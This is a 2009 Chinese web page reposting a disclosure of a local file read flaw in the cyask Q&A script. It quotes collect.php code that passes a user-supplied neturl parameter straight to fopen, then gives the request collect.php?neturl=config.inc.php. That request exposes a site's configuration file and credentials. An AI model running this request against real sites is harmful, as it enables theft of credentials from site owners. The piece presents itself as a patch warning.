pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报cyask的一个本地读文件的漏洞利用
阅读排行

cyask的一个本地读文件的漏洞利用


2009/7/12  编辑:佚名 来源:本站整理

昨天在晚上看到了一个这样的文章, 却没有人说利用的方法, 自己研究了一下, 原来这么简单。

下面是这篇文章的内容。

下午帮同事看一个站, DZ的论坛, 该补的都补了, 咱也没圈day

然后逛了下有个仿百度知道的程序在上面, 和DZ整合了, 原以为也是Dz开发的, 估计也没啥问题

下来看代码, 看到collect.php

——————————-

PHP代码

else  

{   

/*  

检查网址  

*/  

$url=get_referer();   

$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);   

  

$collect_url=emptyempty($neturl) ? $url : $neturl;   

  

$contents = ”;   

if($fid=@fopen($collect_url,”r“))   

{   

do  

{   

$data = fread($fid, 4096);   

if (strlen($data) == 0)   

{   

break;   

}   

$contents .= $data;   

}   

while(true);   

fclose($fid);   

}   

else  

{   

show_message(’collect_url_error’, ”);   

exit;   

}  

———————————-

害人啊, 本来还挺安全的一个站, 整合个毛呃……

找一个cyask的网站, 在其上面注册, 然后登录后, 输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键, 点查看源文件, 哇, 什么都看到了, 我只是说出来利用方法, 希望大家尽早补漏洞。 一切损失与本人无关哦!

相关文章

Android使用分类型RecyclerView仿各大商城首页:**正所谓,一入商城深似海~商城类的App,确实是有许多东西值得学习,但是只要略微斟酌一下,你又会发现,它们之间存在着许多不谋而合的相似,也就是所谓的雷同~既然如此,让我们也来接下地气,先从一个简单的首页做起吧~**实现的效果如下图:1.大...。

iphone7的cydia必装软件有哪些:先来看看Cydia的界面  下方有几个选项,其中比较要关心的是『管理』跟『搜寻』  按一下管理会跳到这个画面,我们首先要做的是加软体源,Cydia跟AppStore不一样的地方是AppStore把所有通过认证的App集中管理,而Cydia则...。

Cydia闪退什么原因:  Cydia闪退解决方法  方法一  1、因为需要修改系统文件,网上说要用IFLIE这个软件,我是用ITOOLS或者IFUNBOX照样可以。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图